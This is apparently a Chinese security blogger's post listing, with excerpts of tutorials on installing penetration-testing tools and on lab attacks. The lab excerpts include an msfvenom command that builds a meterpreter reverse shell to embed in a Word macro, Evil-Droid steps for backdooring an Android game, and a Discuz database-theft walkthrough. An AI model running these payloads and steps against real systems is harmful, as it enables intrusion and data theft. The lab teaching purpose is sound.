Cwillchris
一个安全人
展开
-
kali一键部署各种环境和渗透工具
5、配置6个国内apt源,阿里云、清华、浙大、中科大、重庆大学、东软大学,并更新安装列表。1、找一台纯净的kali系统,用root用户登录,将安装包下载,放到root目录下。21、安装webshell管理工具冰蝎4.0.2、蚁剑4.0.3、哥斯拉3.03。23、安装网站测试脚本7个,如检测网站证书、tls版本、标题状态码等。9、配置docker环境、安装docker-compose命令。18、安装各类jndi注入工具,ldap工具4个。13、部署CmsVulScan指纹识别工具、原创 2023-11-24 14:15:50 · 311 阅读 · 0 评论 -
CMS指纹识别方式
robots.txt文件我们写过爬虫的就知道,这个文件是告诉我们哪些目录是禁止爬取的。工具集合了多个 github 上的开源 cms 扫描工具的 payload 和匹配规则,使用md5、url、正则进行匹配识别。从robots.txt不能直接看出来是什么cms,我们就直接把他复制到百度去查询。Cms扫描器,用于识别网站使用的cms,后面有时间的话会加入poc模块。打开你要检测的网站,再点击此插件,就能看到相关信息。可以勾选允许再隐私窗口,也可以不选,点击好的。选择你对应的浏览器,这儿拿火狐举例子。原创 2023-11-24 13:38:15 · 312 阅读 · 0 评论 -
kali部署ARL灯塔资产系统及使用教程
资产分组功能用于整合资产范围内的域名资产到资产组中,用户也可以对资产组范围内的资产进行监 控,实时监控新增资产。新建资产组,可以通过批量导入的方式将资产范围内的域名资产添加到资产组中,一个资产组中可以 包含多个域名信息。添加监控任务 通过指定资产组,和添加监控任务操作,可以下发域名资产的监控任务到 ARL 中,后台将会根据运行间隔对监控任务内的资产进行扫描,用于发现监控新增的资产。通过创建不同的策略,可以对资产进行不同方案的扫描,可以针对不同类型的资产,根据资产的功能 创建指定的策略。原创 2023-11-24 11:29:14 · 622 阅读 · 0 评论 -
最完整app、小程序、公众号抓包图文教程
WechatPlayer.exe,这包含了微信小程序、公众号、浏览器及播放器等,目标主机和端口选任意,动作选刚才建的代理服务器proxy https 10.105.23.68:8888,点击确定,在上一级窗口点击确定。选择将所有的证书都放在下列存储,点击浏览,选择收信人的根证书颁发机构,点击确定,在上一级窗口点击下一步。点击添加——输入物理机ip和端口(与burp设置一致),选择HTTPS,点确定,在上一级窗口也点确定。代理选择手动,主机名为物理机IP,端口和burp一致,点击保存。原创 2023-09-06 14:37:56 · 386 阅读 · 0 评论 -
dirsearch 网站目录爆破工具
如:dirsearch -u www.baidu.com -e php -random-agents -r。-r 递归目录(跑出目录后,继续跑目录下面的目录)-random-agents 使用随机UA。原创 2023-04-12 10:59:51 · 266 阅读 · 0 评论 -
开源蜜罐hfish安装及使用教程
最后,根据被攻击的情况,又区分了云端 IP 画像和本地 IP 画像在云端画像中,可以通过他的攻击行为判定他的威胁程度。会展示数据库内所有数据,呈现直观展示。HFish 的蜜饵在牵引攻击者的功能上增加了精确定位失陷能力,即每个蜜饵都是唯一的,攻击者入侵用户主机后,如果盗取蜜饵文件中的数据并从任意主机发起攻击,防守者仍能知道失陷源头在哪里。通过增加威胁检测引擎,支持规则检测,且支持上传自定义 yara 规则,系统自动化分析数据,判定攻击行为,丰富 IP 威胁判定,更清晰的感受攻击态势和攻击情况。原创 2023-04-10 15:46:58 · 1408 阅读 · 0 评论 -
开源免费堡垒机Teleport堡垒机的安装
使用管理员账号登陆后,选择【审计】-->【会话审计】进入会话列表就可以自由查看对应用户对指定服务器资产的详细操作记录了。点击添加账号,把要保护的服务器(192.168.1.10)的用户名和密码输入,点测试连接。/etc/init.d/teleport status 查看Teloport的运行状态。/etc/init.d/teleport restart 重启Teleport。/etc/init.d/teleport stop 停止Teleport。《1》添加需要管理的服务器资产,即需要堡垒机保护的服务器。原创 2023-03-08 15:37:22 · 913 阅读 · 0 评论 -
kali安装cobaltstrike详细教程
启动cs的服务端./teamserver 你的ip 密码(密码随便设置一个,待会用于客户端连接)下载cobaltstrike-linux版本,此下载链接提供4.3,4.4,4.5三个版本。给cs的服务端teamserver和客户端start.sh执行权限。进入cobaltstrike目录,ls查看如下。如果出现以下报错,说明jdk有问题。让你校验密码哈希值是否一直,点击是。xshell上传至kali,解压。输入以下内容,点击connect。重新安装jdk解决以上问题。原创 2022-12-30 14:50:02 · 4425 阅读 · 0 评论 -
kali安装ShuiZe自动化信息收集工具
python3 ShuiZe.py -d domain.com --ksubdomain 0 不调用ksubdomain爆破子域名。python3 ShuiZe.py --fofaTitle XXX大学 从fofa里收集标题为XXX大学的资产,然后漏洞检测。python3 ShuiZe.py -d domain.com --justInfoGather 1 仅信息收集,不检测漏洞。python3 ShuiZe.py -d domain.com 收集单一的根域名资产。执行以下命令,出现如下图,说明安装成功。原创 2022-10-26 16:47:02 · 1499 阅读 · 2 评论 -
Kunyu安装使用教程(linux)
Kunyu(坤舆),是一款基于 ZoomEye API 开发的信息收集工具,旨在让企业资产收集更高效,EncodeHash #搜索加密方法的接口。SearchDomain #基于域名搜索子域名。SearchIcon / #图标图片搜索。Seebug #搜索Seebug漏洞信息。SearchHost #查询主机信息。SearchWeb #查询web信息。原创 2022-10-26 14:52:51 · 956 阅读 · 0 评论 -
xsrc腾讯应急响应中心部署全网最详细教程
MariaDB [(none)]> ALTER USER 'root'@'localhost' IDENTIFIED VIA mysql_native_password USING PASSWORD("新密码");访问管理端:http://ip/admin.php, 输入邮箱密码登录(注意输入邮箱而不是刚才的用户名,否则会报程序错误)查看本机ip,然后访问 http://ip/install.php。设置账户名(昵称),邮箱(登录账号),密码(登录密码)访问用户端: http://ip/user.php。.原创 2022-08-16 13:39:21 · 1404 阅读 · 0 评论 -
密码字典生成工具pydictor/john
└─#vim/root/pydictor/results/uniqbiner_095723.txt#可以找到11111,说明合并去重。└─#pythonpydictor.py-tooluniqbiner/tmp/dic/#开始合并。例2生成支持使用数字、小写字母与大写字母3者组合的2到3位数的爆破字典,把生成的字典。ddigital[0-9]#digital[ˈdɪdʒɪtl]数字的。例1生成全部由数字组成且长度为4到6的字典。...原创 2022-08-02 15:27:28 · 742 阅读 · 0 评论 -
搭建discuz论坛并攻破盗取数据库
b、使用/utility/convert/index.php进行版本转换时,会自动创建utility/convert/data/config.inc.php文件。保存好这个地址/var/www/html/discuz/utility/convert/data/192.168.98.66_MySQL.sql。注/var/www/html/utility/convert/data/config.inc.php这个文件原来的网站上没有的。echo"helloworld";...原创 2022-07-27 15:20:02 · 615 阅读 · 0 评论 -
最新版web漏洞扫描工具AppScan\AWVS\Xray安装及使用教程
这就是被动扫描,被动扫描需要你人工访问web页面,然后在页面上提交各种参数,xray会帮你把所有的参数进行测试是否存在问题,爬虫自动扫描在没有爬到页面中的表单以及参数信息时就不会进行对应的测试。所以被动扫描可能更适合我们对网站进行测试,需要注意的是请勿在可能对目标服务器造成不可逆的影响的位置进行测试,比如删除某个资源文件的请求。本次漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。...原创 2022-07-27 11:24:30 · 1000 阅读 · 0 评论 -
利用游戏软件注入漏洞渗透安卓手机
实验环境:kali攻击机(192.168.98.30)window目标机(192.168.98.35)Evil-Droid工具3D摩托安装包实验步骤:1、禁用IPV6echo "net.ipv6.conf.eth0.disable_ipv6 = 1" >> /etc/sysctl.confsysctl -pifconfig2、安装Evil-Droid工具xshell上传master解压并进入目录unzip mastercd原创 2022-05-27 13:45:49 · 1391 阅读 · 3 评论 -
利用宏感染 word 文档获取windows系统的 shell
利用宏感染 word 文档获取window的 shell 实验环境:kali攻击机(192.168.98.30)window目标机(192.168.98.35)office 2016实验步骤:1、生成后门msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.98.30 LPORT=5555 -e x86/shikata_ga_nai -i 10 -f vba-ex原创 2022-05-27 13:43:48 · 352 阅读 · 0 评论 -
nmap使用教程命令大全
Nmap的下载地址为https://nmap.org/download.htmlNmap (Network Mapper,网络映射器)是一款开放源代码的网络探测和安全审核工具。它被设计用来快速扫描大型网络,包括主机探测与发现、开放的端口情 况、操作系统与应用服务指纹识别、WAF识别及常见安全漏洞。它的图形化界面是Zenmap,为DNmap。Nmap的特点如下所示。・ 主机探测:探测网络上的主机,如列出响应TCP和ICMP请求、ICMP请求、 开放特别端□的主机。・ 端口扫描:探测目标主机原创 2022-03-22 09:34:27 · 545 阅读 · 0 评论 -
windows下安装kali linux子系统详细教程
步骤 1 - 启用适用于 Linux 的 Windows 子系统需要先启用“适用于 Linux 的 Windows 子系统”可选功能,然后才能在 Windows 上安装 Linux 子系统。以管理员身份打开 PowerShell(“开始”菜单 >“PowerShell”> 单击右键 >“以管理员身份运行”),然后输入以下命令:dism.exe /online /enable-feature /featurename:Microsoft-Windows-Subsystem-Lin原创 2022-03-19 11:13:25 · 2778 阅读 · 0 评论 -
burpsuite pro 2.1安装配置教程
由burpsuite是java写的,所以要先安装java环境下载地址:Java Archive Downloads - Java SE 8u211 and later电脑是64位选择红框这个版本,32位选上面那个x86版本弹出框让登录oracle账号,勾选I reviewed ,然后点Download如果有账户则直接登录就可以,如果没有,点创建账户邮箱和密码填好,其他随便填,然后创建账户创建完毕后用户名为邮箱,密码就是你..原创 2022-03-04 09:31:41 · 469 阅读 · 0 评论 -
34款Firefox渗透测试插件
34款firefox渗透测试插件,渗透测试、信息收集、代理、加密解密等功能。1:FirebugFirefox的 五星级强力推荐插件之一,不许要多解释2:User Agent Switcher 改变客户端的User Agent的一款插件3:Hackbar 攻城师必备工具,提供了SQL注入和XSS攻击,能够快速对字符串进行各种编码。4:HttpFox 监测和分析浏览器与web服务器之间的HTTP流量5:Live HTTP Headers 即时查看一个网站的HTTP头6:Tamper原创 2021-12-28 17:24:17 · 1164 阅读 · 0 评论 -
Sqlmap安装教程
sqlmap是python编写,所以先安装python环境从我的资源下载安装包,双击打开勾选Add Python3.9 to PATH,选第二个Customize,点Next全部勾选,点Next选择安装路径,红框内容务必勾选,点Install点击Disable点Close验证一下是否安装成功,按win+r,输入cmd输入python,显示出pythonv3.9.7版本,说明安装成功,重启系统。把SQLmap压原创 2021-12-14 16:28:55 · 8255 阅读 · 0 评论 -
AWVS14.3.2安装教程
从我的资源下载安装压缩包双击Acunetix Premium v14.3.210615184进行安装点Next选择 I accept选择安装路径,点Next选择数据安装路径,点Next用邮箱注册账号,输入两次密码,点Next勾选Allow remote。。。,点Next勾选Create a。。。,点Next点Install安装过程弹出如下框,选是点Finish自动弹出浏览器设置原创 2021-12-14 15:47:27 · 608 阅读 · 0 评论 -
APPscan安装教程(Appscan安装包)
下载APPscan安装包(在我的资源里面可以找到)双击打开,选择中文,点确定勾选接受,点下一步选择安装路径(建议纯英文路径)点击完成双击打开等待自动加载,之后就可以使用了...原创 2021-12-04 23:44:56 · 1431 阅读 · 0 评论